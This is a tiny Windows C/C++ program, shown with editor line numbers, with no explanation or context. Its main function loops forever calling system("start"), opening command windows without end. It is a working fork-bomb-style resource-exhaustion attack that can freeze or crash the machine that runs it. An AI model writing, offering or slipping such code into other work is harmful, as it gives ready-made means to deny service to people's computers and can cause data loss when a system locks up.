1
2
3
4
5
6
7
#include<windows.h>
int main(){
while(true){
system("start");
}
return 0;
}